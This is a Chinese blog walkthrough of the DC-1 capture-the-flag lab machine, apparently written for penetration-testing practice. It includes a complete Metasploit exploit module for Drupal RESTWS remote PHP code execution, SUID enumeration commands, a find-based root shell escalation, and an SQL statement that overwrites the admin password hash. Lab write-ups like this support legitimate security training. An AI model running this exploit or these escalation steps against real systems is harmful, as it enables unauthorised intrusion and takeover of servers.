靶机DC-1

已于 2024-07-12 20:41:03 修改
阅读量751 收藏 5
点赞数 22
分类专栏: 靶场 Linux WEB 文章标签: 网络安全 web安全 计算机网络 安全
于 2024-07-12 20:37:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/IDHALASHAO/article/details/140388019
版权
WEB 同时被 3 个专栏收录
15 篇文章 0 订阅
订阅专栏
靶场
11 篇文章 0 订阅
订阅专栏
Linux
4 篇文章 0 订阅
订阅专栏

如果是虚拟机打开报错,可以尝试一下更改

信息收集

arp-scan -l

192.168.56.144

开放端口信息

也就是ssh,和web,Drupal,像这种CMS最直接的就是历史漏洞了,这个界面太熟悉了

Drupal7版本,Apache-HTTP-Server/2.2.22][jQuery][Apache/2.2.22 (Debian)][PHP/5.4.45

以下漏洞文件结合了这两种漏洞,以便同时执行权限提升、SQL 注入和 RCE。攻击者必须猜测或找到端点 URL,这可以稍微缓解漏洞的影响

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Drupal RESTWS Module 7.x Remote PHP Code Execution',
      'Description'    => %q{
        This module exploits the Drupal RESTWS module vulnerability.
        RESTWS alters the default page callbacks for entities to provide
        additional functionality. A vulnerability in this approach allows
        an unauthenticated attacker to send specially crafted requests resulting
        in arbitrary PHP execution

        This module was tested against RESTWS 7.x with Drupal 7.5
installation on Ubuntu server.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Devin Zuczek',                        # discovery
          'Mehmet Ince <mehmet@mehmetince.net>'  # msf module
        ],
      'References'     =>
        [
          ['URL', 'https://www.drupal.org/node/2765567'],
          ['URL',
'https://www.mehmetince.net/exploit/drupal-restws-module-7x-remote-php-code-execution']
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'DisableNops' => true
        },
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        => [ ['Automatic', {}] ],
      'DisclosureDate' => 'Jul 13 2016',
      'DefaultTarget'  => 0
      ))

    register_options(
      [
        OptString.new('TARGETURI', [ true, "The target URI of the
Drupal installation", '/'])
      ], self.class
    )
  end

  def check
    r = rand_text_alpha(8 + rand(4))
    url = normalize_uri(target_uri.path, "?q=taxonomy_vocabulary/", r
, "/passthru/echo%20#{r}")
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => url
    )
    if res && res.body =~ /#{r}/
      return Exploit::CheckCode::Appears
    end
    return Exploit::CheckCode::Safe
  end

  def exploit
    random = rand_text_alpha(1 + rand(2))
    url = normalize_uri(target_uri.path,
      "?q=taxonomy_vocabulary/",
      random ,
      "/passthru/",
      Rex::Text.uri_encode("php -r
'eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));'")
    )
    send_request_cgi(
      'method' => 'GET',
      'uri' => url
    )
  end
end

漏洞利用

search drupal 7.X

info查看

run拿到shell

flag1

首先拿到flag1,这句话通常是用来强调配置文件的重要性 ,但是可以看到权限是www-data,尝试提取

提权

查找suid文件

suid(set uid)是linux中的一种特殊权限,suid可以让调用者以文件拥有者身份运行该文件,所以利用suid提权的核心就是运行root用户所拥有的suid的文件,那么运行该文件的时候就得获得root用户的身份了。

具有suid权限的二进制可执行文件有

nmap
vim
find
bash
more
less
nano
cp
awk

几个常见的命令

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

以find / -perm -u=s -type f 2>/dev/null讲解一下各个参数代表什么

find / -perm -u=s -type f 2>/dev/null
/表示从文件系统的顶部(根)开始并找到每个目录
-perm 表示搜索随后的权限
-u = s表示查找root用户拥有的文件
-type表示我们正在寻找的文件类型
f 表示常规文件,而不是目录或特殊文件
2表示该进程的第二个文件描述符,即stderr(标准错误)
>表示重定向
/dev/null是一个特殊的文件系统对象,它将丢弃写入其中的所有内容。

利用以上这几个命令可以找到正在系统上运行的所有suid可执行文件。

也可以使用sudo -l 列出当前用户可执行的命令

suid提权

find

find 具有suid权限的filename -exec whoami \; -quit
#root
find 具有suid权限的filename -exec /bin/sh -p \; -quit
#whoami
#root

suid文件查询到了/usr/bin/find 有suid权限
touch kun.txt #创建1.txt
#/usr/bin/find kun.txt -exec whoami \;
find kun.txt -exec /bin/bash -p \;
//或者
echo >kun
find kun -exec /bin/bash -p \;
whoami

flag2

接着根据线索提示,可以搜到Drupal的配置文件为sites/default/settings.php

找到数据库信息

连接数据库

查询users表里数据,密码是加盐的密码( 加盐是增强密码存储安全性的重要技术,通过增加随机数据使每个密码哈希值唯一,有效防止了一些常见的密码破解攻击 )很难破解,所以修改用户密码进行替换来解决

$S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR

加密脚本

在www目录下有个脚本文件password-hash.sh

./scripts/password-hash.sh admin123

将admin123进行加密:$S$DqBSBbRrj.fSWI85oItKoPDwrIYHYVKnwsAE4N/HH4U5w6cSEsNa

替换数据

update users set pass='$S$DqBSBbRrj.fSWI85oItKoPDwrIYHYVKnwsAE4N/HH4U5w6cSEsNa' where name='admin';

账号密码已成功更新,admin ,admin123

flag3

点击仪表板找到flag3

flag4

根据提示,查看etc/passwd

flag5

这里是需要提权,前面已经操作了,直接在/root找到flag

参考:浅谈linux suid提权 - 先知社区

Drupal 7.x Services module unserialize() to RCE

摘星怪sec
关注
  • 22
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub靶机DC-1
cyzCc的博客
02-15 926
1.启动DC1靶机发现没有登录密码 2.信息收集 主机发现,由于是与主机nat连接,所以需要找到dc1的IP地址 dc1的Mac地址是 nmap -sP 192.168.211.0/24 所以dc1 靶机的ip地址是192.168.211.133 扫描主机上开启的服务 nmap -A 192.168.211.133 -p 1-65535 发现目标开启了22端口和80端口 22端口考虑ssh...
渗透测试-靶机DC-1-知识点总结
qq_38678845的博客
01-11 2745
渗透测试靶机DC-1的知识点总结
靶机DC-1攻略
weixin_43179779的博客
10-07 1141
dc-1靶机靶机攻略
靶机DC-1 WP
m0_66638011的博客
05-11 1725
DC系列靶机是一系列专门为渗透测试和网络安全实验室设计的虚拟机器。这些靶机提供了一系列不同的漏洞和攻击场景,使渗透测试者可以在这些环境下测试自的技能和工具。DC系列靶机包含多个不同的主题,例如各种操作系统的漏洞,Web应用程序安全和无线网络安全等。它们对初学者和专业人士都有很大的价值,因为它们可以帮助他们了解安全漏洞和如何利用它们进行渗透测试。
靶机 DC-1
m0_66299232的博客
09-09 167
6:根据配置文件提示找到Flag2并发现数据库连接账号密码,根据提示需要提升权限访问敏感文件或者进行爆破账户,在此现在已有信息数据库下手。5:Drupal的默认配置文件为/var/www/sites/default/settings.php并查看。1:根据提示-exec,可能会是SUID提权,在此使用find命令查找suid权限的可执行二进制程序。3:查找敏感文件/etc/passwd发现存在Flag4用户,并使用hydra进行爆破。8:登录网站,搜索发现Flag3,并根据提示需要进行SUID提权。
渗透测试学习之靶机DC-1
xdbzdgx的博客
11-05 2783
1.下载安装靶机 下载链接为DC: 1 ~ VulnHub,里面有三种下载方式任选一种即可,下载后解压为.ova文件,该格式可直接在VMware上打开,如果显示打开失败,依照指示重试即可成功,如果仍无法成功可百度、谷歌解决。 在VMware加载成功之后显示如下界面: 默认状态我们是打不开该系统的,也不知道账号密码的,毕竟我们的目的就是在不知道账号密码的情况下拿到root权限,找到flag。 注意,这里建议把DC-1靶机的网络链接模式改为NAT模式。 本文使用的攻击机为kali(安装在VMwa.
VulnHub靶机 DC-9 靶机 详细渗透过程
rumil的博客
04-27 1550
思路:主机发现—端口扫描—服务探测—指纹识别—Web渗透SQL注入—登入后台—文件包含—"敲门"打开22端口—SSH爆破—得到相关用户信息并远程登录—提权—分别搜寻三个用户下的目录文件—拿有价值信息进行查看—得到带有root权限的执行命令—分析并成功提权。ps:如果ssh不能登录,是因为22端口没有打开,流量过滤了,在前面信息收集当中发现22端口是关闭的。拿到的用户名和密码进行后台,登录进行,发现低端爆出文件未找到的信息,可能存在文件包含,根据提示尝试一下,成功读取/etc/passwd。
DC系列(1)从0开始,kali配置和靶机DC-1
Nikris的博客
01-03 2703
从0开始的kali桥接设置和DC-1渗透。
DC系列靶机DC-1
weixin_53067829的博客
07-01 998
DC系列靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
靶机-DC1通关详细过程
06-27
靶机-DC1通关详细过程
DC1 靶机复现详细流程
10-02
DC1 靶机复现详细流程
复现DC-1靶机.pdf
03-22
1. 使用虚拟机(VM)技术进行靶机复现:文档描述了如何通过虚拟机安装和打开一个名为DC-1的靶机(靶场),具体是指利用VMware这样的虚拟化软件来加载一个名为DC-1.ova的虚拟机文件,从而建立一个安全的测试环境。...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8402
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
特洛伊木马:现代网络安全的隐形威胁
weixin_48579910的博客
08-16 682
特洛伊木马是一种伪装成合法软件或文件的恶意程序。攻击者利用这种伪装,使受害者在不知情的情况下主动安装或运行木马,从而为攻击者打开了进入目标系统的大门。与病毒不同,木马并不会自我复制,而是通过社会工程学等手段诱使用户下载和执行。特洛伊木马虽然是网络世界中的“老兵”,但其隐蔽性和多样性使得它至今仍然是网络安全的一大威胁。了解木马的工作原理和危害,并采取适当的防范措施,可以帮助我们在数字化生活中更加安全地航行。
怎么在网络攻击中屹立不倒
dexun123的博客
08-12 1097
在当今蓬勃发展的网络游戏产业中,服务器安全无疑是企业生存与发展的基石。面对互联网环境中无处不在的DDoS(分布式拒绝服务)与CC(挑战碰撞)攻击威胁,游戏服务器的防御能力与高效处理能力显得尤为重要。相较于追求综合性能平衡的普通服务器,游戏服务器必须专注于构建坚不可摧的安全防线与流畅无阻的游戏体验,以抵御外部侵扰,确保玩家沉浸于无缝的游戏世界。
2024年杭州市网络与信息安全管理员(网络安全管理员)职业技能竞赛的通知
最新发布
Geek极安云科-致力于网络安全事业
08-16 627
竞赛由理论知识和操作技能两部分组成,均采用百分制,小数点后保留两位,60分(含)以上为合格。荣获竞赛一等奖、二等奖的选手,由杭州市人力社保局认定为“杭州市技术能手”,若有不符合认定条件的选手,不再递补;本次竞赛依据《网络与信息安全管理员(网络安全管理员)国家职业技能标准》三级(高级工)等级要求确定技术标准,编制技术文件和命题,适当增加相关新知识、新技术、新技能等内容。1.各区、县(市),有关产业工会,要高度重视此次竞赛,积极发动、广泛宣传、认真组织、严格选拔,推荐综合素质较好、技能水平较高的人员参赛。
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值